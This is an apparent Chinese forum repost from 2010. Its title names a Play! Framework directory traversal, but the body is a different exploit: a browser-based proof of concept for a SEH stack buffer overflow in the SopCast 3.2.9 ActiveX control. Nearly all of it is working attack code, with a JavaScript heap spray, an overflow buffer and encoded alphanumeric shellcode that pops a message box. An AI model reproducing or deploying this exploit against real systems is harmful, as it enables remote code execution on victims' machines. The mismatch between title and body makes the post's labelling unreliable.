[转帖]Exploit Title: Play! Framework <= Directory Transversal Vulnerability
发表于: 2010-8-11 12:10 3630
[转帖]Exploit Title: Play! Framework <= Directory Transversal Vulnerability
2010-8-11 12:10
--> <html> <Center> <H1>Sopcast POC by Sud0<br></H1> <b>Tested on XP SP3 EN on VBox with IE 7<br> Spraying a lot to get a nice unicode usable address 0x20260078<br> I sprayed with a set of P/P/R instructions to come back to the stack<br> ***Need internet connection on the box to trigger the vuln***<br> Wait for the Spray to finish (IE will seem freezed for some seconds)<br> The Sopcast control will be loaded and shown on the page<br> wait approx 3 to 5 seconds and a message box should appear<br> </b> </Center> <!-- # Exploit Title : SopCast BOF # Date : August 10, 2010 # Author : Sud0 # Bug found by : Sud0 # Software Link : http://www.sopcast.com - http://www.easetuner.com # Version : 3.2.9 # OS : Windows # Tested on : XP SP3 En (VirtualBox) Fully Patched, Internet Explorer 7 # Type of vuln : Stack Buffer Overflow - SEH # Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-059 # Big thanks to : my wife for supporting me # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ <object classid='clsid:8FEFF364-6A5F-4966-A917-A3AC28411659' id='boom' ></object> <script> // ######################################### Begin of spraying with (nops + Pop/Pop/Ret) instructions to come back to the stack var nops = unescape("%49%41"); // some nice nops on ECX var ppr = unescape("%49%58%49%58%49%c3"); // Pop EAX / pop EAX / Ret var ppraddy = 0x20260078; var BlockSize = 0x200000; var BlockHeaderSize = 0x26; var PPRSize = 0x6; var nopSize = BlockSize - (PPRSize + BlockHeaderSize); var heapBlocks = (ppraddy+BlockSize*2)/(BlockSize*2); var Spray = new Array(); while (nops.length<nopSize) { nops += nops; } nops = nops.substring(0,nopSize); for (i=0;i<heapBlocks;i++) { Spray[i] = nops + ppr; } // ######################################### end of spraying var buffSize = 522; // (516 + 6 = sop:// )offset to overwrite EIP var x="sop://"; while (x.length<buffSize) x += unescape("%41"); x+=unescape("%41"); x+=unescape("%41"); x+=unescape("%87"); //low unicode bytes of seh destination address 0035 (0x20260087) x+=" "; //High unicode bytes of seh destination address 2026 (0x20260087) x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49"); x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A"); x+=unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49"); x+=unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%52%49%c3"); // some junk before shellcode for (i=0;i<330;i++) { x+=unescape("%41"); } // messagebox shellcode x+="RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIA"; x+="IQI111AIAJQYAZBABABABABkMAGB9u4JBfyjK3kXYRTLdKDNQyBx2pzlqGYS4DKPqlpBkQfzl2kpvMLTKq6LH4KqnmP"; x+="TKMfNXNoLXrUL3Ny9qXQKOYQc0bkplo4nDrk15oLTKPTKUD8KQXj2kMzlX4K1JkpyqjK7sp7OY4KMdtKKQZNLqIomaw"; x+="PilVLRdWPBTlJ6a6olMJawWHil1YoKOKOmk3LKtMXSEgnRkojO4YqZK0fBkzlpKRkqJKlm1JKdKitRkkQxhe9oTLdML"; x+="31es6RKXKywdsY9UCYfbOx2npNZnzLpR8h5LkOKOkOQyQ5kT5kSNj8yRBSSWmLo4nrxhdKKOKOKOe9oUkXoxRLplMPK"; x+="O1XLsnRnNs41Xaet3REbRQx1LmTkZSYK6pVKOPULDqyWRPPWKSxg2Nm5lQwklktPRYXqN9okOYo38PlaQPnQH2HPCrO"; x+="2RqUNQ9KrhqLMTlG1yGsQXnPpXkpKp1XKpNs45s4OxQTmPOrQiQXpoOysDouQXMucHRPPllqWYrhPLktKaQy7qNQ6rN"; x+="rpSpQqBkOvpNQgPB0ioNuyxkZA"; // some junk after shellcode for (i=0;i<40000;i++) { x+=unescape("%41"); } // calling the boom boom.ChannelName=x; // setting channel name boom.SetSopAddress(x); // getting address to trigger the boom </script> </html>